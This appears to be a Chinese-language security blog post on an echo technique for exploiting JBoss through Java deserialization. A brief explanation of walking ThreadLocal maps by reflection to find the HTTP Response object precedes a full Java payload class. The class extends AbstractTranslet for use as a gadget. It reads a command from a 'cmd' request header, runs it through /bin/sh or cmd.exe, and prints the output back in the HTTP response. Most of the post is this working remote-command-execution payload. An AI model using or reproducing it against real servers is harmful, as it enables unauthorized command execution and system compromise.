jbossEcho

  1. 1. jbossEcho

jbossEcho

1652607431846.png

线程里可以直接获取到Response

看了一下ThreadLocal的源码

1652612640397.png

getMap可以直接返回threadLocals

1652612699651.png

思路就是获取table之后遍历其属性直到获取到Response

获取table对反射熟悉的话就很快。

完整回显:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.apache.catalina.connector.Response;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import java.lang.reflect.Field;
import java.lang.reflect.Method;

import java.util.Scanner;

public class JbossEcho extends AbstractTranslet {
public JbossEcho() throws Exception {
Class threadLocalMapClazz = Class.forName("java.lang.ThreadLocal$ThreadLocalMap");
Field tableField = threadLocalMapClazz.getDeclaredField("table");
tableField.setAccessible(true);

Class entryClass = Class.forName("java.lang.ThreadLocal$ThreadLocalMap$Entry");
Field entryValueField = entryClass.getDeclaredField("value");
entryValueField.setAccessible(true);

ThreadLocal tl = new ThreadLocal();

Method getMap = tl.getClass().getDeclaredMethod("getMap", Thread.class);
getMap.setAccessible(true);
Object threadLocalMap = getMap.invoke(tl, Thread.currentThread());
Object[] tables = (Object[]) tableField.get(threadLocalMap);
org.apache.catalina.connector.Response resp = null;
for (int i = 0; i < tables.length; i++) {
try {
String className = entryValueField.get(tables[i]).getClass().getName();
if (className.contains("Response")) {
resp = (Response) entryValueField.get(tables[i]);
break;
}
} catch (Exception e) {
continue;
}
}
Method getreq = resp.getClass().getDeclaredMethod("getRequest");
Object req = getreq.invoke(resp);
Method getHeader = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader",String.class);
getHeader.setAccessible(true);
// String cmd = (String) req.getClass().getDeclaredMethod("getHeader",String.class).invoke(req,"cmd");
String cmd = (String)getHeader.invoke(req, "cmd");
Method getWriter = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");
getWriter.setAccessible(true);
Object writer = getWriter.invoke(resp);

// cmd = "id";
String[] commands = new String[3];
String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK" : "UTF-8";
if (System.getProperty("os.name").toUpperCase().contains("WIN")) {
commands[0] = "cmd";
commands[1] = "/c";
} else {
commands[0] = "/bin/sh";
commands[1] = "-c";
}
commands[2] = cmd;
// response2.getWriter().write(new Scanner(Runtime.getRuntime().exec(commands).getInputStream(),charsetName).useDelimiter("\\A").next());
writer.getClass().getDeclaredMethod("println", String.class).invoke(writer, new Scanner(Runtime.getRuntime().exec(commands).getInputStream(), charsetName).useDelimiter("\\A").next());
writer.getClass().getDeclaredMethod("flush").invoke(writer);
writer.getClass().getDeclaredMethod("close").invoke(writer);
}

@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

}

@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

}


}

1652661851080.png